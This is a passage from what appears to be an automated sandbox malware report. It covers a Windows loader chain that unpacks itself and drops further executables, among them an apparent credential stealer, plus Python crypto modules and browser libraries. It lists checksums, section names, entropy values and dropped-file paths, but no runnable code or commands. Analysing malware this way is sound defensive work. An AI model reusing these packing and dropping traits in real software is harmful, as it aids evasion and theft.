                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB5F1000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: client_jackbastadguy.exe, 00000017.00000002.2820647337.00007FFE0EB52000.00000002.00000001.01000000.00000024.sdmp

                                  Data Obfuscation

                                  barindex
                                  Detected unpacking (changes PE section rights)
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeUnpacked PE file: 0.2.ebjtOH70jl.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 5.2.axplong.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwujlavl:EW;zofmlovi:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeUnpacked PE file: 26.2.0d261d49cf.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;fhrhjlue:EW;cszsfekv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhrhjlue:EW;cszsfekv:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeUnpacked PE file: 27.2.834ad20df2.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 28.2.skotes.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 29.2.skotes.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xsrqoxbv:EW;frrbcldo:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeUnpacked PE file: 33.2.0d261d49cf.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;fhrhjlue:EW;cszsfekv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhrhjlue:EW;cszsfekv:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeUnpacked PE file: 34.2.305d0bf1b2.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hnsygimb:EW;kduywxtx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hnsygimb:EW;kduywxtx:EW;.taggant:EW;
                                  Source: VCRUNTIME140.dll.22.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: real checksum: 0x454bc0 should be: 0x457fe8
                                  Source: ebjtOH70jl.exeStatic PE information: real checksum: 0x32388b should be: 0x32909f
                                  Source: _raw_cast.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x7870
                                  Source: _rust.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x7ef99a
                                  Source: _raw_aesni.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xd2c3
                                  Source: gold1111111111[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0xd3f68
                                  Source: _modexp.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xdf94
                                  Source: _pytransform.dll.22.drStatic PE information: real checksum: 0x11edfe should be: 0x11dbef
                                  Source: _cffi_backend.cp310-win_amd64.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x3108a
                                  Source: _strxor.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x10aad
                                  Source: gold123.exe.5.drStatic PE information: real checksum: 0xe44fc should be: 0xe51f1
                                  Source: random[1].exe0.5.drStatic PE information: real checksum: 0x330222 should be: 0x3292ce
                                  Source: am209[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x79814
                                  Source: _ARC4.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xc8ba
                                  Source: _raw_des3.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x10195
                                  Source: _cpuid_c.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xe2b6
                                  Source: _MD5.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x12225
                                  Source: _SHA224.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x13d1f
                                  Source: _keccak.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xaf1b
                                  Source: random[1].exe2.5.drStatic PE information: real checksum: 0x454bc0 should be: 0x457fe8
                                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x32388b should be: 0x32909f
                                  Source: _raw_arc2.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x966e
                                  Source: gold1111111111.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xd3f68
                                  Source: _MD2.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x110e3
                                  Source: _raw_eksblowfish.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xc1e6
                                  Source: am209.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x79814
                                  Source: legs.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xccc7f
                                  Source: _SHA256.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xa85b
                                  Source: _raw_cfb.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x9762
                                  Source: freebl3.dll.11.drStatic PE information: real checksum: 0xafdcb should be: 0xf3b0
                                  Source: _scrypt.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x80b5
                                  Source: _Salsa20.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x3657
                                  Source: 834ad20df2.exe.5.drStatic PE information: real checksum: 0x330222 should be: 0x3292ce
                                  Source: _raw_des.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x124f2
                                  Source: _raw_cbc.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x3a38
                                  Source: _raw_ecb.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x4c1b
                                  Source: _MD4.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x9fa9
                                  Source: _RIPEMD160.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x6f18
                                  Source: _raw_ocb.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x14299
                                  Source: freebl3[1].dll.11.drStatic PE information: real checksum: 0xafdcb should be: 0xf3b0
                                  Source: _poly1305.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xbea9
                                  Source: 0d261d49cf.exe.5.drStatic PE information: real checksum: 0x4f9862 should be: 0x4f7679
                                  Source: _SHA1.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xbd05
                                  Source: _SHA512.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xbd08
                                  Source: gold123[1].exe.5.drStatic PE information: real checksum: 0xe44fc should be: 0xe51f1
                                  Source: _raw_aes.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x14e8f
                                  Source: _raw_blowfish.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x11ec6
                                  Source: random[1].exe1.5.drStatic PE information: real checksum: 0x1e9abc should be: 0x1e6cdd
                                  Source: _ghash_portable.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xa111
                                  Source: _SHA384.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x100ff
                                  Source: md__mypyc.cp310-win_amd64.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x280fa
                                  Source: _ec_ws.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xc5419
                                  Source: _chacha20.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x741f
                                  Source: _BLAKE2b.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x864f
                                  Source: _ghash_clmul.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x9c9d
                                  Source: md.cp310-win_amd64.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0xf357
                                  Source: _raw_ctr.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x46bb
                                  Source: legs[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0xccc7f
                                  Source: random[1].exe.5.drStatic PE information: real checksum: 0x4f9862 should be: 0x4f7679
                                  Source: 3e641862d3.exe.5.drStatic PE information: real checksum: 0x1e9abc should be: 0x1e6cdd
                                  Source: _raw_ofb.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x727a
                                  Source: stealc_valenciga[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x47bfa
                                  Source: defnur.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x79814
                                  Source: _BLAKE2s.pyd.22.drStatic PE information: real checksum: 0x0 should be: 0x50f7
                                  Source: stealc_valenciga.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x47bfa
                                  Source: skotes.exe.27.drStatic PE information: real checksum: 0x330222 should be: 0x3292ce
                                  Source: ebjtOH70jl.exeStatic PE information: section name:
                                  Source: ebjtOH70jl.exeStatic PE information: section name: .idata
                                  Source: ebjtOH70jl.exeStatic PE information: section name: lwujlavl
                                  Source: ebjtOH70jl.exeStatic PE information: section name: zofmlovi
                                  Source: ebjtOH70jl.exeStatic PE information: section name: .taggant
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                                  Source: axplong.exe.0.drStatic PE information: section name: lwujlavl
                                  Source: axplong.exe.0.drStatic PE information: section name: zofmlovi
                                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                                  Source: random[1].exe.5.drStatic PE information: section name:
                                  Source: random[1].exe.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe.5.drStatic PE information: section name: fhrhjlue
                                  Source: random[1].exe.5.drStatic PE information: section name: cszsfekv
                                  Source: random[1].exe.5.drStatic PE information: section name: .taggant
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name:
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name: .idata
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name: fhrhjlue
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name: cszsfekv
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name: .taggant
                                  Source: liddad[1].exe.5.drStatic PE information: section name: .eh_fram
                                  Source: liddad.exe.5.drStatic PE information: section name: .eh_fram
                                  Source: random[1].exe0.5.drStatic PE information: section name:
                                  Source: random[1].exe0.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe0.5.drStatic PE information: section name: xsrqoxbv
                                  Source: random[1].exe0.5.drStatic PE information: section name: frrbcldo
                                  Source: random[1].exe0.5.drStatic PE information: section name: .taggant
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name:
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: .idata
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: xsrqoxbv
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: frrbcldo
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: .taggant
                                  Source: random[1].exe1.5.drStatic PE information: section name:
                                  Source: random[1].exe1.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe1.5.drStatic PE information: section name:
                                  Source: random[1].exe1.5.drStatic PE information: section name: jwcxmuyi
                                  Source: random[1].exe1.5.drStatic PE information: section name: zcgagdls
                                  Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name:
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: .idata
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name:
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: jwcxmuyi
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: zcgagdls
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: .taggant
                                  Source: random[1].exe2.5.drStatic PE information: section name:
                                  Source: random[1].exe2.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe2.5.drStatic PE information: section name:
                                  Source: random[1].exe2.5.drStatic PE information: section name: hnsygimb
                                  Source: random[1].exe2.5.drStatic PE information: section name: kduywxtx
                                  Source: random[1].exe2.5.drStatic PE information: section name: .taggant
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name:
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: .idata
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name:
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: hnsygimb
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: kduywxtx
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: .taggant
                                  Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                                  Source: freebl3[1].dll.11.drStatic PE information: section name: .00cfg
                                  Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                                  Source: mozglue[1].dll.11.drStatic PE information: section name: .00cfg
                                  Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                                  Source: msvcp140[1].dll.11.drStatic PE information: section name: .didat
                                  Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                                  Source: nss3[1].dll.11.drStatic PE information: section name: .00cfg
                                  Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                                  Source: softokn3[1].dll.11.drStatic PE information: section name: .00cfg
                                  Source: VCRUNTIME140.dll.22.drStatic PE information: section name: _RDATA
                                  Source: _pytransform.dll.22.drStatic PE information: section name: .xdata
                                  Source: libcrypto-1_1.dll.22.drStatic PE information: section name: .00cfg
                                  Source: libssl-1_1.dll.22.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.22.drStatic PE information: section name: PyRuntim
                                  Source: skotes.exe.27.drStatic PE information: section name:
                                  Source: skotes.exe.27.drStatic PE information: section name: .idata
                                  Source: skotes.exe.27.drStatic PE information: section name: xsrqoxbv
                                  Source: skotes.exe.27.drStatic PE information: section name: frrbcldo
                                  Source: skotes.exe.27.drStatic PE information: section name: .taggant
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A8D84C push ecx; ret 0_2_00A8D85F
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A8122F pushad ; ret 0_2_00A81230
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A80B3B push esp; retf 0000h0_2_00A80B3C
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_0068D84C push ecx; ret 1_2_0068D85F
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006C12A9 push ecx; ret 5_2_006C12B1
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0068D84C push ecx; ret 5_2_0068D85F
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0068DEF6 push ecx; ret 5_2_0068DF09
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0046534A push ecx; ret 6_2_0046535D
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BA1E1 push ecx; ret 8_2_006BA1F4
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006A750F pushad ; iretd 8_2_006A7510
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006A3586 pushad ; ret 8_2_006A358D
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFA1E1 push ecx; ret 9_2_00DFA1F4
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DE3586 pushad ; ret 9_2_00DE358D
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DE750F pushad ; iretd 9_2_00DE7510
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DEE726 pushad ; iretd 9_2_00DEE72E
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_0142685A push ebp; retf 10_3_0142685D
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6EE0 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6EE0 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6EE0 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6F68 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013BCB60 pushad ; retf 10_3_013BCB61
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013BCB66 push 68013BCBh; retf 10_3_013BCB6D
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013BC352 push eax; ret 10_3_013BC355
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013BC34E push eax; ret 10_3_013BC351
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6EE0 push esi; iretd 10_3_013C6FB2
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 10_3_013C6EE0 push esi; iretd 10_3_013C6FB2
                                  Source: ebjtOH70jl.exeStatic PE information: section name: entropy: 7.13202937691271
                                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.13202937691271
                                  Source: random[1].exe0.5.drStatic PE information: section name: entropy: 7.043608104748375
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: entropy: 7.043608104748375
                                  Source: random[1].exe1.5.drStatic PE information: section name: jwcxmuyi entropy: 7.948432737086368
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: jwcxmuyi entropy: 7.948432737086368
                                  Source: random[1].exe2.5.drStatic PE information: section name: hnsygimb entropy: 7.95540524337016
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: hnsygimb entropy: 7.95540524337016
                                  Source: skotes.exe.27.drStatic PE information: section name: entropy: 7.043608104748375
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Math\_modexp.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\sqlite3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\legs[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\libffi-7.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD5.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\client_jackbastadguy[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA1.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA512.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_strxor.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\liddad[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA256.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA384.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
